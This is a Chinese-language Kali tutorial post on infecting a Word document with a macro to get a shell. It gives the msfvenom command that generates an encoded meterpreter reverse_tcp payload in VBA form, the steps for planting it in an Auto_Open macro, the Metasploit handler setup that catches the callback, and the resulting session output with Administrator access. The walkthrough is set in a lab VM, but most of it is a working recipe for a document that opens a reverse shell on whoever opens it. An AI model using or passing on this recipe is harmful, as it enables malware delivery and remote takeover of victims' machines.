网络安全kali之利用宏感染word文档获取shell

235 阅读1分钟

首先将office 2016.zip上传到win7虚拟机上,解压后,安装一下office。

┌──(root💀xuegod53)-[~]
└─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -e 
x86/shikata_ga_nai -i 10 -f vba-exe

视频教程

执行完成后会生成2段代码

第一段代码是MACRO CODE [ˈmækrəʊ kəʊd] 宏代码

从这里开始:

在这里插入图片描述

到这里结束:

在这里插入图片描述

第二段代码 payload。

在这里插入图片描述

注:*号中的内容不要,从这个往下开始复制,如下:

在这里插入图片描述

一直到最后。

打开Word新建空白文档,新建宏

在这里插入图片描述

宏名Auto_Open

在这里插入图片描述

清除默认的代码,复制第一段code代码内容到编辑器中,然后返回到Word内容编辑区。

在这里插入图片描述

复制第二段代码payload到word正文,然后保存文档。

在这里插入图片描述

按Ctrl+s保存

在这里插入图片描述

MSF配置侦听

msf6 exploit(multi/browser/java_jre17_driver_manager) > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.53
msf6 exploit(multi/handler) > jobs -K
msf6 exploit(multi/handler) > exploit

2、配置好侦听之后我们打开我们制作的word文档,文档一旦打开就会执行payload连接到MSF,关闭word文档之后session不受影响。

在这里插入图片描述

打开之后我们回到MSF控制台

在这里插入图片描述

Session已经建立

meterpreter > getuid 
Server username: XUESHEN\Administrator

我们尝试把payload转移到其他进程

meterpreter > getpid 		获取当前进程pid
Current pid: 2932
meterpreter > ps                #查看进程列表,在ps列出的进程列表,倒数第4个就是我们进程的pid

在这里插入图片描述